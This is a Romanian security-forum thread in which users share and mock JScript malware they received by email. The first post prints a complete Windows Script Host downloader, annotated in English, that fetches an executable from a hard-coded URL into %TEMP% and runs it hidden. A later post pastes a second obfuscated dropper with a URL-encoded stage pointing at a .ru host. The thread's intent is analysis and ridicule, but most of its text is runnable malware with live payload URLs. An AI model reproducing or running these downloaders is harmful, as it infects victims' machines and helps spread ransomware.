Nytro Posted May 12, 2016 Report Share Posted May 12, 2016 Salut, Am mai primit un email cu un JS intr-un ZIP. E stupid, incepe cu comentarii, are pe la mijloc codul si se termina cu comentarii. In fine, JS-ul e urmatorul:
// Windows Script Host (JScript) downloader, as received in a ZIP attachment.
// Analyst annotations only: the code is unchanged apart from restoring line
// breaks and dropping the filler `/* QU5zoJYpASu6 */` comments that were
// sprinkled between tokens. Identifier names (WARRANTIES0, mousemove0,
// penetration, ...) are random dictionary words and carry no meaning.
// What the lines below do: fetch a file from the hard-coded URL with
// MSXML2.XMLHTTP, write it to %TEMP%\qSj87b4UV.exe through ADODB.Stream,
// write a one-line .bat that "start"s it, and run that .bat in a hidden
// window. Treat the URL and both file names as indicators; do not run this.
var WARRANTIES0 = false;                 // "running on Windows" flag; only the @cc_on block can set it
var mousemove0 = "";                     // becomes "MLH", the middle of "MSXML2.XMLHTTP"
var code;                                // becomes "ResponseBody"
var delts = "C" + "r"+"e"+"ateObject";   // "CreateObject"
// JScript conditional-compilation block. Note the nested `/* ... */` right
// after `/*@cc_on`: a non-JScript engine ends the comment there and fails at
// `@if`, so this file only parses under WSH (kept as-is for that reason).
/*@cc_on /* QU5zoJYpASu6 */
@if (@_win32 || @_win64)
// NOTE(review): the paste lost its line breaks; this `//` most likely ended its
// line right here, because the assignments below (WARRANTIES0 = true above all)
// must execute for the script to get past the Quit() check further down.
WARRANTIES0 = true;
mousemove0 = "MLH";
code = "R" + "esponseB" + "ydo".split('').reverse().join('');     // "ResponseBody"
objref = ("noitisop").split('').reverse().join('');              // "position"
directionally0 = "eliFoTevaS".split('').reverse().join('');      // "SaveToFile"
B12F40 = "A"+"DODB";                                             // "ADODB"
mousemove1 = "s" + "end";                                        // "send"
// Payload URL, split to defeat string scanning. Indicator of compromise; do
// not fetch it from an analysis host.
dishy = "ht"+"tp:"+"//s"+"cr"+"ubs"+".dr"+"es"+"sco"+"ol."+"co"+"/z"+"cv"+"3h"+"hs";
dishy0 = "G\x45"+"T";                                            // "GET"
@end
@*/
// Not Windows / no conditional compilation: print a vulgarity and exit 1
// (the thread below speculates about the author's nationality from it).
if (!(WARRANTIES0)) { WScript.Echo("pizzzzda"); WScript.Quit(1); }
var Summary = this["WScript"];           // the WScript object, looked up on the global
// WScript.CreateObject("WScript.Shell"); the comma expression discards
// "Trafdscks". delay0 (= 11) is assigned but never used.
var delts0 = function mousemove() {return Summary[delts](("Trafdscks", "WScript")+".Shell");}(), delay0 = 4 * 2 + 3;
var Amount0 = 1 * (2 - 0);                           // 2
var countRemain = Amount0 - ((1 * 2) + 0) * 1;       // 0: used as Run()'s window style (hidden) and wait flag
// shell.Run(command, 0, 0): hidden window, do not wait for the process.
function directionally(Summary0){delts0[("Ifasd ", "Gef.H.", "R")+ "u" + ("fudfk", "n")](Summary0, countRemain, countRemain);};
function cir(){return delts;};                        // "CreateObject"
{
var code0 = "M" + "SX"+"ML2."+"X"+mousemove0+"T"+"TP";   // "MSXML2.XMLHTTP"
var delay = ""; delay = "o"+"pen";                       // "open"
// stream.SaveToFile("%TEMP%/qSj87b4UV.exe", 2); the arithmetic yields 2,
// i.e. adSaveCreateOverWrite. Called for the 2nd and 3rd streams below.
function penetration(FFFFF00) {FFFFF00[directionally0](delts0["E"+"xpandEnvir"+"o"+"nmentStrings"]("%T"+"E"+"M"+"P%/") + "qSj87b4UV.ex" + "e", (-9815 + 9817) * 1); return 0;};
if (true){
penetration1 = code0;
cos1 = Summary[delts](penetration1);                 // the XMLHTTP object
var WARRANTIES = 3-2;                                // loop state: 1 = not sent yet, 2 = sent, 0 = done
do {
for (;WARRANTIES;){
try {
if (WARRANTIES == 1) {
// open("GET", url, false): the comma expression yields false, so the
// request is synchronous and the readyState polling below is moot.
cos1[delay](dishy0, dishy, (true, false));
cos1[mousemove1]();                                  // send()
cos0 = "S"+"l"+"eep";
WARRANTIES = 2;
}
Summary[cos0](120);                                  // WScript.Sleep(120)
// readyState < 4 -> keep polling. The lowercase spelling works because COM
// property lookup through IDispatch is case-insensitive.
if (cos1["r"+"eadystate"] < 2 * 2) continue;
WARRANTIES = countRemain;                            // 0: both loops end after this pass
function cos(B12F4) {var penetration0 = (123, B12F4); return penetration0;};   // never called
FFFFF0 = delts0["E"+"xpandEnvir"+"o"+"nmentStrings"]("%T"+"E"+"M"+"P%/") + "qSj87b4UV.ex" + "e";           // %TEMP%/qSj87b4UV.exe
countRemain0 = delts0["E"+"xpandEnvir"+"o"+"nmentStrings"]("%T"+"E"+"M"+"P%/") + "suc11.05.2016kit.bat";   // %TEMP%/suc11.05.2016kit.bat
// Contents of the .bat. No semicolon here: the original relied on a line
// break (ASI), so this statement must stay on its own line.
objref0 = "start "+FFFFF0+"\r\nexit"
// 1st ADODB.Stream: text mode (type 2), write the .bat and save it.
penetration1 = directionally1 = Summary[cir()](B12F40+"."+"Str"+"e"+"a"+"m");
penetration1[delay]();                               // open()
penetration1["t"+"y"+"pe"] = 2;                      // adTypeText
Amount = "w"+"r"+"i"+"t"+"e";                        // "write"
penetration1["Charset"] = "windows-1251";
penetration1[Amount+"Text"](objref0);                // WriteText(bat contents)
directionally1[objref] = 1 * 0;                      // position = 0
penetration1[directionally0](countRemain0, 2 * 1);   // SaveToFile(bat path, adSaveCreateOverWrite)
directionally1["c"+"l"+"o"+"s"+"e"]();
// 2nd stream: writes the single character "M" to the .exe path. The 3rd
// stream overwrites that file, so the purpose of this step is unclear from
// the code alone (placeholder or leftover) -- do not read meaning into it.
penetration1 = directionally1 = Summary[cir()](B12F40+"."+"Str"+"e"+"a"+"m");
penetration1[delay]();
penetration1["t"+"y"+"pe"] = 2;
penetration1["Charset"] = "windows-1251";
penetration1[Amount+"Text"]("M");
directionally1[objref] = 0;
penetration(penetration1);
directionally1["c"+"l"+"o"+"s"+"e"]();
// 3rd stream: binary mode (type 1), write(ResponseBody), then SaveToFile with
// position = 1 rather than 0 -- i.e. the first byte of the HTTP body is
// skipped. Presumably the server prepends a junk byte so the transfer does
// not start with "MZ"; confirm against a capture before relying on that.
penetration1 = directionally1 = Summary[cir()](B12F40+"."+"Str"+"e"+"a"+"m");
penetration1[delay]();
penetration1["t"+"y"+"pe"] = 1 * 1;                  // adTypeBinary
penetration1[Amount](cos1[code]);                    // write(xhr.ResponseBody)
directionally1[objref] = 1;                          // position = 1
penetration(penetration1);                           // SaveToFile(%TEMP%/qSj87b4UV.exe, overwrite)
directionally1["c"+"l"+"o"+"s"+"e"]();
// Run the .bat hidden; it "start"s the dropped .exe and exits.
if (1 && WARRANTIES0) directionally(countRemain0);
// Every error is swallowed. A failure before WARRANTIES reaches 0 (e.g. the
// download throwing) leaves the for-loop condition true, so it retries forever.
} catch(cir0){};
};
}while (WARRANTIES);
}
}
E "obfuscat" cu pula dishy = "ht"+"tp:"+"//s"+"cr"+"ubs"+".dr"+"es"+"sco"+"ol."+"co"+"/z"+"cv"+"3h"+"hs"; Ma intreb ce nationalitate o avea autorul: if (!(WARRANTIES0)) { WScript.Echo("pizzzzda"); WScript.Quit(1); } Haideti baietii, puteti mai mult! 2 Link to comment Share on other sites More sharing options...
Speed123 Posted May 12, 2016 Voiau sa te infecteze, Nytro. Arde-i! Poate au aflat si indienii de "pizda".
yo20063 Posted May 12, 2016 Sufera tare cine l-a scris. Parerea mea e ca putea face ceva mult mai destept, mult mai usor, fara atatea concatenari de siruri ("a" + "b" + ...).
malsploit Posted May 16, 2016 Am vreo 20 de adrese de email pe care le tin ca spam-trap si a fost o perioada, pe la inceputul anului, in care primeam zilnic. Faceau spread pentru un locker (ransomware).
nein Posted May 17, 2016 Report Share Posted May 17, 2016 Spoiler _ = 38417, vim = "B%0A%09%09ante%20%3D%20Knox%3B%0A%09", Find = "del"; e080 = "DELE"; pasv = "0%5Cx6cac%5Cx65%22%5D%28/GPL2/%2C%20%22%5Cx", Aviv = "_z"; ins = "_hsl", EREG = "x35%5Cx47%5Cx36%5Cx341%5Cx314%5Cx47%5Cx74", dot = "More", WIN = "Day", e052 = "2.replace%28/hi/%2C%20%22/%5Cx53%5C"; var mark = "walk", e089 = "End"; Bump = "5Cx64%22%5B%22%5Cx72%5Cx65p%5Cx6c%5Cx61%5C"; var kses = "pop", amet = "ce%28/IF/%2C%20%22%5Cx53%5Cx63%5Cx7", b3db = 2, Cop = "var%20Knox%20%3D%20%22Nav%22%2C%20_%20%3"; Old = "A%09zx%24vf%28%29%3B%0Atry%20%7B%0A%09%09Kn"; var ow = "D%2041245%3B%0Avar%20co%20%3D%20%22_dir%22%3B", yi = "%0Awild%20%3D%20%22http%3A//gbi-stroi.u7m"; Link = "te.position%20%3D%200%3B%0A%7D%0A%09w%24g"; resp = ".ru/img/.../log.php%3Ff%3D%22%2C%0A", XFN = "e030%20%3D%20%22isn%22%3B%20ante%20%3D%20%22"; e192 = "s%5D%3B%0A%7D%0A%09au%24th%28%29%3B%0A"; f161 = "runs%22%3B%20var%20omit%20%3D%20%22", Cras = "ccc%22%3B%20var%20TYPE%20%3D%20%22dc%"; var but = "5B%22%5Cx72epl%5Cx61%5Cx63%5Cx65%22%5D%28/"; know = "22%2C%20thus%20%3D%200%2C%0Af335%20%", w3 = "8Motu%29%20%7B%0A%09%09%22C%5Cx52O%5Cx4e%22%", io = "3D%20%22ico%22%3B%20raw%20%3D%20%22403%2", IXR = "2%2C%0Aog%20%3D%20%22fed%22%2C%0AOrd%20%3D"; tied = "Cx6f%5Cx64%5Cx79%22%29%5D%29%3B%0A%09%09an"; w2 = "%20%22_nx%22%2C%0APast%20%3D%201%3B%0Avar%2", gift = "0UA%20%3D%20%22tel%22%3B%0Avar%20St%20", Rica = "29%3B%09Z_%20%3D%20co%20%3D%20Knox%3B%0Afun"; var mind = "%3D%20%22rtl%22%2C%0AZ_%20%3D%20%22rec"; neat = "t%22%2C%20vi%20%3D%20%22weak%22%3B%20va"; SET = "5Cx66%5Cx61ke%22%3B%0A%7D%20catch%20%28p%29"; var held = "r%20e178%20%3D%20%22su%22%3B%20var%20", ho = "Rome%20%3D%202%2C%0Af30%20%3D%20%22Out%22", Send = "Set"; GB = "%3B%0A%0Ae030%20%3D%20omit%20%3D%20f335%20"; pi = "Cx2eStrea%5Cx6d%22%29%29%3B%0A%7D%0A%3B%0"; var apps = "%3D%20this%3B%0Afunction%20f100%28%29%0A"; am = "%7B%0A%09Ord%20%3D%20e030%5B%22P%5Cx61%5Cx"; f227 = 
"3B%0A%7D%0A%09Knox.type%20%3D%20%20%2B%2"; Give = "6c%5Cx69%22.replace%28/Pali/%2C%20%22%5Cx57%5", dd = "Cx53%5Cx63r%5Cx69p%5Cx74%22%29%5D%3B%0A%7D%0", a74 = "x63%5Cx65%22%5D%28/gid/%2C%20%22%5Cx52%5Cx"; gp = "Af100%28%29%3B%0AUA%20%3D%20Ord%5B%22%5Cx4f", some = "%5Cx72%5Cx61l%22%5B%22r%5Cx65%5Cx70%5Cx6c%5C", usr = "ment%28%22%5Cx47%5Cx50L%5Cx32%22%5B%22re%5Cx7"; How = "x61%5Cx63%5Cx65%22%5D%28/Oral/%2C%20", e126 = "%22%5Cx43r%5Cx65%5Cx61t%5Cx65%5Cx4fb", Test = "ction%20au%24th%28%29%0A%7B%0A%09%09"; amp = "%5Cx6a%5Cx65%5Cx63%5Cx74%22%29%5D%28%22%5"; var ereg = "%5D.split%28%22%5Cx2e%22%29%5B%20%2B%20thu"; var sbug = "Cx48%5Cx6fok%22.replace%28/Hook/%2C%20", HTTP = "%22%5Cx57%5Cx53%5Cx63r%5Cx69%5Cx70%5Cx", peek = "%20%7B%0A%09%09Z_%5Be178%5D%28St%28%22%5", tube = "74.%5Cx53%5Cx68%5Cx65ll%22%29%29%3B%", tech = "0Avi%20%3D%20omit%5B%22%5Cx661%5Cx35%", Yi = "%29%3B%0A%7D%0A%7D%0A%0A"; var cell = "5Cx39%22%5B%22%5Cx72epl%5Cx61%5Cx63%5Cx65%22%", tmp = "5D%28/f159/%2C%20%22%5Cx41ct%5Cx69%5Cx76%5Cx6"; iso = "SVG/%2C%20%22AD%5Cx4f%5Cx44%5Cx42%5"; tan = "5X%5Cx4f%5Cx62%5Cx6a%5Cx65%5Cx63t%22%29%5D%3"; var mit = "B%0Atry%20%7B%0A%09f335%20%3D%20e030%3B%0A%0"; var e96 = "ox.open%28%29%3B%0A%7D%20catch%20%2", AYS = "9f30%20%3D%20TYPE.BrowseForFolder%280%2C%20"; fb8 = "%22%5Cx66%5Cx31%5Cx35%5Cx37%22%5B%22%5Cx72e", RNTO = "0Past%3B%0Afunction%20w%24get%28%29%0A%7", soon = "%5Cx70l%5Cx61ce%22%5D%28/f157/%2C%2"; UCT = "%09ante.write%28og%5B%22%5Cx67%5Cx69%"; var blue = "0%22%5Cx53%5Cx65l%5Cx65%5Cx63%5Cx74Fol"; var Url = "de%5Cx72%22%29%2C%20%20%2B%20thus%29%3B%0A"; var f228 = "65%5Cx73%5Cx70o%5Cx6e%5Cx73%5Cx65%5Cx42%5", To = "%7D%20catch%20%28Connection%29%20%7B%0A"; e136 = "function%20Long%28%29%0A%7B%0A%09%09f30%", bars = "et%28%29%3B%0ASt%20%3D%20UA.Environ", Afar = "20%3D%20wild%20%2B%20raw%3B%0A%7D%0A%09Long%", htm = "28%29%3B%0Atry%20%7B%0A%09%09this%20", Data = "50ro%5Cx63%5Cx65%5Cx73%5Cx73%22%29%", alt = "%3D%20%22%5Cx76i%5Cx6d%22%3B%0A%7D%20ca", Long = 
"tch%20%28conf%29%20%7B%0A%09%09og%20%3D%", pro = "e178%20%3D%20Ord%5B%22%5Cx49F%22.repla", msn = "20new%20vi%28%22%5Cx4d%5Cx4d%22%5B%22%5Cx72%5"; conf = "2%5Cx69%5Cx70%5Cx74%5Cx4ea%5Cx6d%5Cx65%22%29"; e078 = "Cx65%5Cx70%5Cx6c%5Cx61%5Cx63e%22%5D%28/MM/%2C", high = "%20%22%5Cx4d%5Cx73%5Cx78%5Cx6dl%5Cx32%5Cx2eX"; var File = "try%20%7B%0A%09%09this%20%3D%20%22%"; e193 = "%5Cx4d%5Cx4c%5Cx48%5Cx54%5Cx54P%5Cx2e6%5Cx2", gee = "e%5Cx30%22%29%29%3B%0A%09%09og.open%2"; var sin = "Cx74em%5Cx70%22%29%20%2B%20%22%5Cx68i%2", ba = "8%22%5Cx47ET%22%2C%20f30%2C%200%29%3B%0A%", fat = "7D%0A%09og.send%28%29%3B%0A%09Ord.S"; var A1B1 = "%5Cx2e%5Cx65x%5Cx65%22%29%2C%20%20%2B%20Rome"; Redo = "leep%288193%29%3B%0A%09zx%24vf%20%3D", back = "%20function%28%29%0A%7B%0A%09Knox%20%"; Load = "3D%20new%20vi%28%22%5Cx53V%5Cx47%22%"; Find = e080 = Aviv = this; ins = this["I\x74"["\x72ep\x6c\x61c\x65"](/It/, "\x57\x53\x63\x72\x69\x70\x74")]; function fi$le() { dot = ins.CreateObject("\x6ctr".replace(/ltr/, "\x57S\x63\x72\x69pt\x2e\x53\x68ell")); WIN = new Find.ActiveXObject("\x651\x310"["\x72\x65\x70\x6c\x61c\x65"](/e110/, "S\x63r\x69\x70t\x69\x6eg.\x46\x69\x6ce\x53\x79\x73t\x65\x6d\x4f\x62j\x65ct")); mark = dot.Environment("\x76e".replace(/ve/, "P\x72\x6f\x63\x65\x73\x73")); } fi$le(); try { this = "\x49\x63o\x6e"; } catch (U) { e089 = mark("\x74e\x6dp") + "fa\x69r"["r\x65p\x6c\x61ce"](/fair/, "/\x73\x61\x76\x65\x54oF\x69\x6c\x65\x2e\x6a\x73"); } kses = WIN.OpenTextFile(e089, + b3db, true, 0); ugly$ = function() { kses.write(unescape(Cop + ow + yi + resp + XFN + f161 + Cras + know + io + IXR + w2 + gift + mind + neat + held + ho + GB + apps + am + Give + dd + gp + some + How + e126 + amp + sbug + HTTP + tube + tech + cell + tmp + tan + mit + AYS + fb8 + soon + blue + Url + To + e136 + Afar + htm + alt + Long + msn + e078 + high + e193 + gee + ba + fat + Redo + back + Load + but + iso + pi + Old + e96 + w3 + f227 + RNTO + vim + UCT + Bump + a74 + f228 + tied + Link + bars + usr + pasv + Data + Rica 
+ Test + pro + amet + conf + ereg + e192 + File + SET + peek + sin + e052 + EREG + A1B1 + Yi)); kses.close(); dot.Run(e089); ins.Sleep(12000); Send = mark("\x74\x65\x6dp") + "\x6c".replace(/l/, "\x2f\x53\x35G\x36\x34\x31\x314\x47\x74.\x65\x78\x65"); dot.Run(Send); } ; ugly$(); aiureaaaaaaa ! si eu am primit Link to comment Share on other sites More sharing options...